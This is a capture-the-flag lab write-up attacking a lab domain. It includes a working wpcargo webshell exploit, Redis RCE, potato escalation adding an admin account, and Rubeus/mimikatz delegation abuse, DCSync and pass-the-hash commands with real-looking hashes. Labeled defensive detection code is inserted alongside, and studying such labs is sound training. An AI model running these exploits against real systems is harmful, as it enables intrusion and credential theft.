Brute4Road Writeup

External reconnaissance

D:\桌面\信息收集\fscan2>fscan.exe -h 39.99.138.28

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 39.99.138.28:22
[+] 端口开放 39.99.138.28:21
[+] 端口开放 39.99.138.28:80
[+] 端口开放 39.99.138.28:6379
[+] 存活端口数量: 4
[*] 开始漏洞扫描...
[+] Redis扫描模块开始...
[*] 网站标题 http://39.99.138.28 状态码:200 长度:4833 标题:Welcome to CentOS
[+] ftp 39.99.138.28:21:anonymous
[->]pub
[+] Redis 39.99.138.28:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[!] 扫描错误 39.99.138.28:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 4/4
[*] 扫描结束,耗时: 12.92017s

Redis unauthenticated access

Master-slave replication RCE

Note: the master-slave replication RCE is not that reliable; if it fails once, the target machine must be rebooted!

flag01

python -c 'import pty;pty.spawn("/bin/bash")'

Spawn an interactive shell

SUID privilege escalation
$ find / -user root -perm -4000 -print 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
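A defender-side check for a listing like the one above, added here and not part of the original writeup: it diffs a `find / -perm -4000` listing against an assumed baseline of binaries that legitimately carry the SUID bit on a stock CentOS 7 host, and can also walk a live tree for SUID files. The baseline set is an assumption for illustration, not taken from the target.

```python
# Added example, not from the original writeup. Compares a `find / -perm -4000`
# listing with an assumed baseline of SUID binaries that are normal on CentOS 7,
# and can also walk a live filesystem for files carrying the SUID bit.
import os
import stat

# Baseline is an assumption for illustration; build yours from a clean image
# (e.g. rpm --verify) rather than from a host you are investigating.
EXPECTED_SUID = {
    "/usr/sbin/pam_timestamp_check", "/usr/sbin/usernetctl", "/usr/sbin/unix_chkpwd",
    "/usr/bin/at", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/passwd",
    "/usr/bin/chage", "/usr/bin/umount", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/sudo", "/usr/bin/crontab", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/pkexec", "/usr/libexec/dbus-1/dbus-daemon-launch-helper",
    "/usr/lib/polkit-1/polkit-agent-helper-1",
}

# Constructed sample: the listing shown above, whitespace-separated.
SAMPLE_LISTING = """/usr/sbin/pam_timestamp_check /usr/sbin/usernetctl /usr/sbin/unix_chkpwd
/usr/bin/at /usr/bin/chfn /usr/bin/gpasswd /usr/bin/passwd /usr/bin/chage /usr/bin/base64
/usr/bin/umount /usr/bin/su /usr/bin/chsh /usr/bin/sudo /usr/bin/crontab /usr/bin/newgrp
/usr/bin/mount /usr/bin/pkexec /usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1"""

def find_suid(root: str) -> list:
    """Walk `root` and return regular files whose mode has the SUID bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def unexpected_suid(paths, baseline=EXPECTED_SUID) -> list:
    """Paths (an iterable, or whitespace-separated text) that are not in the baseline."""
    if isinstance(paths, str):
        paths = paths.split()
    return sorted(set(paths) - set(baseline))

if __name__ == "__main__":
    print(unexpected_suid(SAMPLE_LISTING))          # ['/usr/bin/base64']
    print(unexpected_suid(find_suid("/usr/bin")))   # live audit of one tree
```

Anything the diff reports deserves a look at who set the bit and why; a package-owned binary that gained SUID outside the package is the classic sign of a planted escalation path.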

Internal network penetration

Set up a tunnel and proxy to route the internal traffic out.

Internal reconnaissance


[redis@centos-web01 tmp]$ ./fscan -h 172.22.2.1/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.3 is alive
(icmp) Target 172.22.2.7 is alive
(icmp) Target 172.22.2.16 is alive
(icmp) Target 172.22.2.18 is alive
(icmp) Target 172.22.2.34 is alive
[*] Icmp alive hosts len is: 5
172.22.2.3:88 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.18:80 open
172.22.2.16:80 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.16:445 open
172.22.2.18:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.18:139 open
172.22.2.3:139 open
172.22.2.16:139 open
172.22.2.34:135 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.7:6379 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
[*] NetInfo
[*]172.22.2.3
[->]DC
[->]172.22.2.3
[*] WebTitle http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] NetInfo
[*]172.22.2.34
[->]CLIENT01
[->]172.22.2.34
[*] NetBios 172.22.2.34 XIAORANG\CLIENT01
[*] WebTitle http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetBios 172.22.2.3 [+] DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] OsInfo 172.22.2.3 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[+] ftp 172.22.2.7:21:anonymous
[->]pub
[*] WebTitle http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
已完成 20/20
[*] 扫描结束,耗时: 12.942671303s

WordPress: wpcargo RCE

┌──(root㉿kali)-[/home/hey/Desktop]
└─# proxychains wpscan --url http://172.22.2.18
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK
[+] URL: http://172.22.2.18/ [172.22.2.18]
[+] Started: Wed Mar 5 15:31:25 2025

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK
Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.22.2.18/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.22.2.18/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://172.22.2.18/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.22.2.18/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
| Found By: Rss Generator (Passive Detection)
| - http://172.22.2.18/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
| - http://172.22.2.18/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>

[+] WordPress theme in use: twentytwentytwo
| Location: http://172.22.2.18/wp-content/themes/twentytwentytwo/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://172.22.2.18/wp-content/themes/twentytwentytwo/readme.txt
| [!] The version is out of date, the latest version is 1.9
| Style URL: http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2
| Style Name: Twenty Twenty-Two
| Style URI: https://wordpress.org/themes/twentytwentytwo/
| Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wpcargo
| Location: http://172.22.2.18/wp-content/plugins/wpcargo/
| Last Updated: 2024-08-08T17:00:00.000Z
| [!] The version is out of date, the latest version is 7.0.6
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 6.x.x (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK > (0 / 137) 0.00% ETA: ??:??:??
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK > (15 / 137) 10.94% ETA: 00:00:10
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.2.18:80 ... OK==== > (38 / 137) 27.73% ETA: 00:00:04
Checking Config Backups - Time: 00:00:03 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 5 15:31:41 2025
[+] Requests Done: 158
[+] Cached Requests: 19
[+] Data Sent: 40.023 KB
[+] Data Received: 127.852 KB
[+] Memory used: 261.609 MB
[+] Elapsed time: 00:00:15

PoC

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    # 8-bit binary of the byte, with '0' replaced by 'x' (black pixel) and '1' kept (white pixel)
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'  # trailing slash required: the paths below are appended directly
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
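Detection logic for the write primitive the PoC above relies on (a client-supplied `filepath` to wpcargo's barcode.php, followed by requests to the dropped file), added here as an example and not part of the original writeup. It runs over constructed Apache combined-format log lines; the web root `/var/www/html` is an assumption used to map the written file to its URL path.

```python
# Added example, not from the original writeup: detection logic for the
# barcode.php write primitive shown in the PoC above, run over constructed
# Apache combined-format log lines. DOCROOT is an assumption (/var/www/html).
import re
from urllib.parse import parse_qs, unquote, urlsplit

BARCODE = "/wp-content/plugins/wpcargo/includes/barcode.php"
DOCROOT = "/var/www/html"   # assumed web root, used to map a written file to its URL path
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: a benign feed fetch, the PoC's two requests, and a normal barcode render.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2025:15:40:01 +0800] "GET /index.php/feed/ HTTP/1.1" 200 5120
10.0.0.9 - - [05/Mar/2025:15:41:10 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 78
10.0.0.9 - - [05/Mar/2025:15:41:12 +0800] "POST /webshell.php?1=system HTTP/1.1" 200 311
10.0.0.7 - - [05/Mar/2025:15:42:00 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=TRACK123&size=2 HTTP/1.1" 200 1902
"""

def detect_wpcargo_abuse(log_text: str) -> list:
    """Return (line_no, client_ip, reason) for suspicious requests, in log order."""
    alerts, dropped = [], set()   # dropped: URL paths of files barcode.php was told to write
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        params = parse_qs(parts.query)
        if parts.path == BARCODE and "filepath" in params:
            target = unquote(params["filepath"][0])
            # A client choosing the output file is the bug itself; a .php target is a webshell drop.
            kind = "webshell-write" if target.lower().endswith(".php") else "arbitrary-file-write"
            alerts.append((n, m["ip"], f"{kind} via barcode.php filepath={target}"))
            if target.startswith(DOCROOT):
                dropped.add(target[len(DOCROOT):])
        elif parts.path in dropped:
            alerts.append((n, m["ip"], f"{m['method']} to file written by barcode.php: {parts.path}"))
    return alerts

if __name__ == "__main__":
    for line_no, ip, reason in detect_wpcargo_abuse(SAMPLE_LOG):
        print(f"line {line_no} {ip}: {reason}")
```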

The WordPress configuration leaks sensitive information

flag02

The database credentials are leaked; connect to it directly.

Credential harvesting on the compromised machine

After gaining another machine, the job is once again information gathering, above all collecting credentials of every kind, in preparation for the next lateral movement.

A large number of passwords were found; dump them and use them as a wordlist for password spraying against the internal hosts.

Password spraying

Spray the internal hosts with the wordlist built above.

MSSQL password reuse

BadPotato privilege escalation

Add a user and RDP:

flag03
C:/Users/Public/sweetpotato.exe -a "net user hey qwer1234! /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators hey /add"
mstsc /admin /v:172.22.2.16:3389

Domain penetration

The domain xiaorang.lab exists.

Since there is a domain, we can use BloodHound for domain enumeration:

BloodHound Analysis

Find Shortest Paths to Domain Admins

Find the shortest paths to Domain Admins.

This shows the shortest path from an ordinary user to a domain-admin machine.

Shortest Paths to Unconstrained Delegation Systems

Query the shortest paths to unconstrained delegation systems: a machine with unconstrained delegation caches users' Kerberos tickets when they authenticate to it, so an attacker who controls such a machine may impersonate a high-privilege user.

Attack path

Step 1: find computers that can be used

MSSQLSERVER.XIAORANG.LAB is a key node because it:

  1. Is managed by several high-privilege groups (e.g. ADMINISTRATORS@XIAORANG.LAB).
  2. Can be reached over Remote Desktop (CanRDP).
  3. May have unconstrained delegation enabled, meaning that if a high-privilege user logs on to this machine, their Kerberos ticket is stored there.

Step 2: hijack a high-privilege ticket

Assume the attacker controls MSSQLSERVER.XIAORANG.LAB:

  1. Wait for a high-privilege user (e.g. a domain admin) to log on: if DOMAIN ADMINS@XIAORANG.LAB or ENTERPRISE ADMINS@XIAORANG.LAB logs on to the MSSQL server, their Kerberos tickets are stored on that machine automatically.
  2. Pass-the-Ticket: extract the high-privilege user's ticket with a tool such as Mimikatz, then access the domain controller DC.XIAORANG.LAB as that user.

Step 3: full control of AD

Once the attacker can access DC.XIAORANG.LAB as a domain admin, they can add new users to DOMAIN ADMINS, disable security policies, deploy persistence backdoors, and so on.

Shortest Paths to AD

At this point we also know that this host has constrained delegation.

Constrained delegation attack

Viewing constrained delegation

BadPotato.exe cmd /c "AdFind.exe -b \"DC=xiaorang,DC=lab\" -f \"(&(samAccountType=805306369)(msds-allowedtodelegateto=*))\" msds-allowedtodelegateto"

# Query computers in the domain with unconstrained delegation
AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

# Query service accounts with unconstrained delegation
AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn
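The BloodHound discussion above and these AdFind filters rest on three attributes: sAMAccountType (805306369 for machine accounts, 805306368 for users), the userAccountControl bit 524288 (0x80000, TRUSTED_FOR_DELEGATION, matched with the bitwise-AND rule 1.2.840.113556.1.4.803), and msDS-AllowedToDelegateTo for constrained delegation. The classifier below, added here as an example and not part of the original writeup, applies the same logic to constructed account records and adds the protocol-transition bit that distinguishes the two constrained cases; the sample UAC values are assumptions, not an export from the lab.

```python
# Added example, not from the original writeup. Classifies accounts by Kerberos
# delegation type from the same attributes the AdFind filters above query.
# The account records at the bottom are constructed, not exported from the lab.

# userAccountControl bits (documented Microsoft values).
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
# sAMAccountType values used in the filters above.
SAM_NORMAL_USER, SAM_MACHINE = 805306368, 805306369

def classify_delegation(acct: dict) -> str:
    """'unconstrained', 'constrained-protocol-transition', 'constrained' or 'none'."""
    uac = int(acct.get("userAccountControl", 0))
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"           # caches the TGT of every user who authenticates to it
    if acct.get("msDS-AllowedToDelegateTo"):
        # With protocol transition the service can obtain a ticket for any user via
        # S4U2Self without that user ever authenticating to it, so it rates a closer look.
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained-protocol-transition"
        return "constrained"
    return "none"

def delegation_report(accounts: list, include_dcs: bool = False) -> list:
    """(sAMAccountName, kind, targets) for each delegating account.

    Domain controllers are unconstrained by design, so they are skipped unless asked for."""
    rows = []
    for a in accounts:
        uac = int(a.get("userAccountControl", 0))
        if uac & SERVER_TRUST_ACCOUNT and not include_dcs:
            continue
        kind = classify_delegation(a)
        if kind != "none":
            rows.append((a["sAMAccountName"], kind, tuple(a.get("msDS-AllowedToDelegateTo", []))))
    return rows

SAMPLE_ACCOUNTS = [  # constructed illustration; UAC values are assumptions
    {"sAMAccountName": "DC$", "sAMAccountType": SAM_MACHINE, "userAccountControl": 0x82000},
    {"sAMAccountName": "MSSQLSERVER$", "sAMAccountType": SAM_MACHINE,
     "userAccountControl": 0x1001000, "msDS-AllowedToDelegateTo": ["cifs/DC.xiaorang.lab"]},
    {"sAMAccountName": "CLIENT01$", "sAMAccountType": SAM_MACHINE, "userAccountControl": 0x1000},
    {"sAMAccountName": "svc_web", "sAMAccountType": SAM_NORMAL_USER,
     "userAccountControl": 0x10200, "msDS-AllowedToDelegateTo": ["http/UBUNTU-WEB02.xiaorang.lab"]},
]

if __name__ == "__main__":
    for row in delegation_report(SAMPLE_ACCOUNTS):
        print(row)
```

Every non-DC row in the report is a candidate for the attack path described above and a candidate for remediation: remove the delegation flag where it is not needed, or move the account into the Protected Users group and mark sensitive accounts "cannot be delegated".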

Approach 1: S4U2Self

Request a TGT for the machine account MSSQLSERVER

Use Rubeus to request a forwardable ticket for the machine account itself

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:cea3e66a2715c71423e7d3f0ff6cd352 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt

Forge a high-privilege ST with S4U

Use Rubeus's S4U2Self extension to request, on behalf of the domain administrator Administrator, a ticket for the domain controller's LDAP service and inject the resulting ticket into memory.

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:

Dump the hashes of domain users

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

WMI lateral movement

python wmiexec.py -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3

Approach 2: TGS ticket passing

Export MSSQLSERVER's tickets with mimikatz

privilege::debug
sekurlsa::tickets /export
exit

Request a ticket with kekeo

tgs::s4u /tgt:[0;3e4]-2-1-40e10000-MSSQLSERVER$@krbtgt-XIAORANG.LAB.kirbi /user:Administrator@XIAORANG.LAB /service:cifs/DC.XIAORANG.LAB 
exit

Pass the ticket (ptt)

mimikatz.exe "kerberos::ptt TGS_Administrator@XIAORANG.LAB@XIAORANG.LAB_cifs~DC.XIAORANG.LAB@XIAORANG.LAB.kirbi" "exit"

flag04